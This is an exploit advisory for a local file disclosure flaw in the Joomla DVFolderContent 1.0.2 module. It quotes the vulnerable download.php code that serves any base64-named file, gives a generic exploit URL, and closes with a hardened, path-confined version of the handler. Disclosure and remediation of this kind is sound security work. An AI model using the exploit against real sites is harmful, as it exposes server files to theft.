######################
# Exploit Title : Joomla DVFolderContent V1.0.2 Module - Local File Disclosure
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.dvextensions.de/en/extensions/dvfoldercontent
# Category [ Webapps ]
# Tested on [ Win ]
# Version : V1.0.2
# Date 2016/10/01
######################

PoC

The vulnerable page is /modules/mod_dvfoldercontent/download.php

    // The path comes straight from the request and is never restricted to a directory
    $file = base64_decode($_GET['f']);

    if (is_file($file)) {
        $fileinfo = pathinfo($file);
        $filename = $fileinfo['basename'];
        $filesize = filesize($file);

        header("Content-Type: application/octet-stream; name=$filename");
        header("Content-Disposition: attachment; filename=$filename");
        header("Content-Length: $filesize");
        header("Pragma: no-cache");
        // Any file readable by the web server process is returned to the client
        readfile($file);
    }

Exploit:

http://server/modules/mod_dvfoldercontent/download.php?f=base64

Video : http://persian-team.ir/showthread.php?tid=165&pid=298

######################
# Discovered by : Mojtaba MobhaM
# B3li3v3 M3 I will n3v3r St0p
# Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R $ Mr_Mask_Black And All Persian Hack Team Members
# Homepage : http://persian-team.ir
######################
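
A hardened form of the download.php handler shown in the PoC, as an added example that is not the vendor's code or patch: the decoded value is treated as a name relative to one permitted folder, canonicalised with realpath(), and refused if it resolves outside that folder. The function name resolve_download() and the base folder __DIR__ . '/files' are assumptions made for illustration.

```php
<?php
// Added example (not vendor code). resolve_download() and the base folder
// below are hypothetical; the base stands for the one folder meant to be served.

function resolve_download(string $encoded, string $allowedBase): ?string
{
    // Strict mode rejects input with characters outside the base64 alphabet.
    $requested = base64_decode($encoded, true);
    if ($requested === false || $requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }

    $base = realpath($allowedBase);
    if ($base === false) {
        return null;
    }

    // Treat the value as relative to the base, then canonicalise it so that
    // "..", symlinks and mixed separators are resolved before the check.
    $real = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($real === false || !is_file($real)) {
        return null;
    }

    // The canonical path must still sit under the base folder.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

$param = $_GET['f'] ?? '';
$path  = resolve_download(is_string($param) ? $param : '', __DIR__ . '/files');
if ($path === null) {
    http_response_code(404);
    exit;
}

// Restrict the name placed in the header so it cannot inject header syntax.
$name = preg_replace('/[^A-Za-z0-9._-]/', '_', basename($path));

header('Content-Type: application/octet-stream');
header('X-Content-Type-Options: nosniff');
header('Content-Disposition: attachment; filename="' . $name . '"');
header('Content-Length: ' . filesize($path));
header('Pragma: no-cache');
readfile($path);
```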